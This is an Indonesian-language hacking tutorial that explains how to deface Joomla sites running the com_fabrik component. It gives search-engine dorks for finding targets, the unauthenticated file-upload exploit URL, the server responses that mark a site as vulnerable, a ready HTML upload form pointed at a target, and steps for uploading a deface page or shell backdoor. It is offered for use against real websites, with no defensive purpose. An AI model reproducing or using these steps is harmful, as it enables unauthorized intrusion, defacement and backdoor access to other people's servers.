Oke kali ini gue bakal remake tutorial deface metode com_fabrik. Kenapa gue remake? Karena gue baru aja nemuin sebuah bug yang gue jadikan csrf. Yok simak aja langsung..!!
Dork : - inurl:index.php?option=com_fabrik intext:name
- /index.php?option=com_fabrik site:
- option=com_fabrik&format=raw site:
- com_fabrik site:
- /component/fabrik/ site:
- /index.php?option=com_fabrik site:
- option=com_fabrik&format=raw site:
- com_fabrik site:
- /component/fabrik/ site:
Exploit : index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
Ciri ciri web yang vuln dan tidak vuln:
{"error":"Error. Unable to upload file."} = Not vuln
{"filepath":null,"uri":null} = Vuln
1. Pilih dork ..
2. Masukan exploit
3. Masuk csrf
2. Masukan exploit
3. Masuk csrf
<form method="POST" action="http://site.co.il/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" enctype="multipart/form-data"><input type="file" name="file" /> <button> Upload </button> </form>
(Ganti site.co.li sama site target lo)
4. Upload script deface/shell backdoor lo
5. Akses site.com/script.htm atau site.com/[path]/script.htm
5. Akses site.com/script.htm atau site.com/[path]/script.htm
Kurang faham? Bisa komen atau chat di grup chat wa..
Thanks
-azay
